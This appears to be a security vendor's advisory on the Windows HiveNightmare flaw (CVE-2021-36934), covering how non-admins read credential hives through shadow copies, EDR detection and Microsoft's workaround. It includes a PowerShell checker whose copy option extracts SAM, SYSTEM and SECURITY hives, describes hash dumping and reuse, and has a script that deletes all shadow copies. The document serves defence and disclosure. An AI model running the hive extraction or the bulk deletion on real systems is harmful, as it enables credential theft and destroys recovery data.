HiveNightmare, also known as SeriousSAM, is a local privilege escalation vulnerability (CVE-2021-36934) in Windows 10 (version 1809 and later) and Windows 11 that a local non-admin user can exploit with little effort to reach SYSTEM privileges.
An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have the ability to execute code on a victim system to exploit this vulnerability.
A hive is a logical group of keys, subkeys, and values in the Windows Registry — effectively acting as a home for hashed passwords, application and network settings, system decryption keys and more. The SAM, SECURITY, SYSTEM and other sensitive hive files are stored in the folder %SystemRoot%\System32\Config\.
The Security Account Manager (SAM) is a database file that stores the hashed (NTLM) passwords of local user accounts.
The SECURITY hive stores security information for the local system, including user rights and permissions, password policies and group membership, as well as LSA secrets and cached domain logon credentials.
The SYSTEM hive stores the boot key (syskey) material needed to decrypt the password hashes held in the SAM, so an attacker who has SAM and SYSTEM together can recover usable NTLM hashes.
The bug in Windows 10 and later allows a local non-admin user to read these sensitive registry hives and thus dump the credential material in the SAM, SYSTEM, and SECURITY hives. According to the default permissions shown below, the Users group (BUILTIN\Users) has read and execute (RX) access to the SAM file, inherited from the parent folder.
Even though the file permissions allow read access, the live hive files are held open exclusively by the kernel and cannot be opened, moved or copied while Windows is running. To get around this, the exploit code shown below calls CreateFile on the hive as it exists inside a Volume Shadow Copy (VSC), the snapshots Windows creates for System Restore and other recovery scenarios.
The 'fullpath' passed to CreateFile is the C string literal '\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\\Windows\\System32\\config\\SAM', which the compiler resolves to the device path \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\System32\config\SAM (each snapshot is exposed as a numbered device: HarddiskVolumeShadowCopy1, HarddiskVolumeShadowCopy2, and so on). The Volume Shadow Copy Service, which is included with Windows, creates point-in-time copies of files or volumes while they are in use. The files inside a snapshot are not locked and carry the same overly permissive ACL as the live files, so even while Windows is running the SAM is readable through the VSC. Note that exploitation therefore requires at least one shadow copy to exist on the system volume; on Windows 10 that is usually the case because System Restore and Windows Update create them.
When the exploit HiveNightMare.exe runs, it copies the SAM, SYSTEM, and SECURITY hives to the working directory, making them accessible to the local non-admin user.
After successfully dumping the hashes and secrets from the SAM, SYSTEM, and SECURITY hives (for example with a tool such as secretsdump), the non-admin user can reuse a local administrator's NTLM hash, DPAPI key or other recovered secret to elevate privileges and run arbitrary code with SYSTEM rights.
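The two preconditions described above (the permissive hive ACL and a readable shadow copy) can be checked from an unprivileged session. The following PowerShell is an added example, not code from the original post or from the public HiveNightMare.exe proof of concept. It assumes the .NET file API on the PowerShell build in use accepts the \\?\GLOBALROOT device path form, and the MaxIndex cap is an arbitrary choice:

```powershell
# Added example: check whether a host is exploitable by HiveNightmare (CVE-2021-36934).
# Runs as a standard (non-admin) user; neither check needs elevation.

function Test-HiveAcl {
    # Microsoft's own check: if BUILTIN\Users holds (I)(RX) on the SAM, the host is vulnerable.
    param([string]$Hive = "$env:windir\System32\config\SAM")
    $acl = icacls $Hive 2>&1 | Out-String
    return [bool]($acl -match 'BUILTIN\\Users:\(I\)\(RX\)')
}

function Test-ShadowCopyHiveRead {
    # Probe the numbered shadow-copy devices (HarddiskVolumeShadowCopy1..N) for readable hives,
    # using the same \\?\GLOBALROOT device path form the exploit hands to CreateFile.
    # Assumption: [System.IO.File] on this PowerShell build accepts the \\?\ prefix.
    param(
        [string[]]$Hives = @('SAM', 'SYSTEM', 'SECURITY'),
        [int]$MaxIndex = 16,          # assumed upper bound on snapshot indices to probe
        [string]$CopyTo = $null       # optional: directory to copy readable hives into
    )
    $results = @()
    for ($i = 1; $i -le $MaxIndex; $i++) {
        foreach ($h in $Hives) {
            $path = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$i\Windows\System32\config\$h"
            try {
                # Open read-only with read sharing; success means the ACL lets us read it.
                $fs = [System.IO.File]::Open($path,
                        [System.IO.FileMode]::Open,
                        [System.IO.FileAccess]::Read,
                        [System.IO.FileShare]::Read)
                $fs.Close()
                $results += [pscustomobject]@{ Index = $i; Hive = $h; Readable = $true; Path = $path }
                if ($CopyTo) {
                    # Mirrors what the PoC does: copy the hive out of the snapshot into a working directory.
                    [System.IO.File]::Copy($path, (Join-Path $CopyTo "$h-shadow$i"), $true)
                }
            } catch [System.UnauthorizedAccessException] {
                # Snapshot exists but its ACL denies us: not exploitable through this index.
                $results += [pscustomobject]@{ Index = $i; Hive = $h; Readable = $false; Path = $path }
            } catch {
                # Any other error (typically no snapshot with this index): nothing to report.
            }
        }
    }
    return $results
}

# Usage: report the ACL state and every hive that a non-admin can read out of a snapshot.
Write-Host ("SAM ACL grants BUILTIN\Users RX: {0}" -f (Test-HiveAcl))
Test-ShadowCopyHiveRead | Where-Object Readable | Format-Table Index, Hive, Path -AutoSize
```

A host is exploitable only when Test-HiveAcl returns True and Test-ShadowCopyHiveRead reports at least one readable hive; a patched host, or one where the ACL was fixed and the old snapshots were deleted, fails both checks. Only pass -CopyTo on a lab machine you own, since the copied files are live credential material.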
Detecting and blocking HiveNightMare with FortiEDR:
FortiEDR's real-time detection triggered the event shown below when the malicious process "HiveNightMare.exe" attempted to access credentials in order to elevate privileges.
This was triggered by the following EDR rules under the exfiltration prevention policy.
FortiEDR v5 threat hunting can be used to examine the activity of the malicious process 'HiveNightMare.exe'. Filtering on the activity type 'File Write' highlights the sensitive hives being copied and written to the working directory.
The image below is from one of those file write operations and shows the process HiveNightMare.exe running as the local (non-admin) user and creating a copy of the SAM hive in the working directory.
The following is a summary of the MITRE techniques associated with this exploit, as well as the recommended mitigation strategies:
TA0004: Privilege Escalation
Valid Accounts: Local Accounts (T1078.003)
An adversary obtains the credentials of a local account and abuses them to elevate privileges and to harvest further credentials through OS Credential Dumping.
· Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
· Audit local accounts permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.
TA0006: Credential Access
OS Credential Dumping: Security Account Manager (T1003.002)
An adversary attempts to extract credential material from the Security Account Manager (SAM) database file.
· Limit credential overlap across accounts and systems.
· Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled.
Microsoft fixed CVE-2021-36934 in the August 2021 cumulative updates; on hosts that cannot be patched, the Microsoft workaround is to both restrict access to the hive files and delete existing shadow copies. Both steps are needed: fixing the ACL on the live files does not change the ACL inside snapshots that were taken earlier, so those remain readable until they are removed.
Restrict access to the contents of %windir%\system32\config
Delete Volume Shadow Copy Service (VSS) shadow copies
1. Delete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\system32\config.
2. Create a new System Restore point (if desired).
Impact of the workaround: deleting shadow copies could affect restore operations, including the ability to restore data with third-party backup applications. For more information on how to delete shadow copies, see KB5005357 - Delete Volume Shadow Copies.
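The following PowerShell applies the two-step workaround above and then re-verifies the result. It is an added example, not a script from the original post or from KB5005357; it assumes the system volume is C:, that it is run from an elevated (Run as administrator) prompt, and that Windows PowerShell 5.1 is in use (Checkpoint-Computer is not available in PowerShell 7):

```powershell
# Added example: apply the CVE-2021-36934 workaround and confirm it took effect.
# Must run elevated. Assumes the hives live on the C: volume.

function Invoke-HiveNightmareWorkaround {
    param(
        [string]$Volume = 'C:',
        [switch]$CreateRestorePoint
    )
    $config = "$env:windir\System32\config"

    # Step 1: restrict access. Re-enabling inheritance makes the hive files take the
    # parent folder's ACL, which does not grant BUILTIN\Users read access.
    icacls "$config\*.*" /inheritance:e | Out-Null

    # Step 2: delete shadow copies made before the ACL change. Snapshots keep the
    # old, permissive ACL, so they stay readable until removed.
    vssadmin delete shadows /for=$Volume /all /quiet | Out-Null

    # Step 3 (optional): create a fresh restore point now that the ACL is fixed.
    if ($CreateRestorePoint) {
        Checkpoint-Computer -Description 'Post CVE-2021-36934 workaround' `
                            -RestorePointType MODIFY_SETTINGS
    }

    # Verify: BUILTIN\Users must no longer hold (I)(RX) on the SAM, and no shadow
    # copies should remain on the volume.
    $acl     = icacls "$config\SAM" | Out-String
    $shadows = vssadmin list shadows /for=$Volume | Out-String
    return [pscustomobject]@{
        UsersStillReadSam = [bool]($acl -match 'BUILTIN\\Users:\(I\)\(RX\)')
        ShadowCopiesLeft  = [bool]($shadows -match 'Shadow Copy ID')
    }
}

# Usage: both fields should be False when the workaround has been applied successfully.
Invoke-HiveNightmareWorkaround -CreateRestorePoint
```

Run this only after confirming that no backup product on the host depends on the existing shadow copies, since step 2 removes every snapshot on the volume; the verification object makes it easy to roll the check into fleet-wide reporting.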
The FortiGuard Managed Detection and Response (MDR) Service is designed for customers of the FortiEDR advanced endpoint security platform. This team of threat experts monitors, reviews and analyzes every alert, proactively hunts threats, and takes actions on behalf of customers to ensure they are protected according to their risk profile.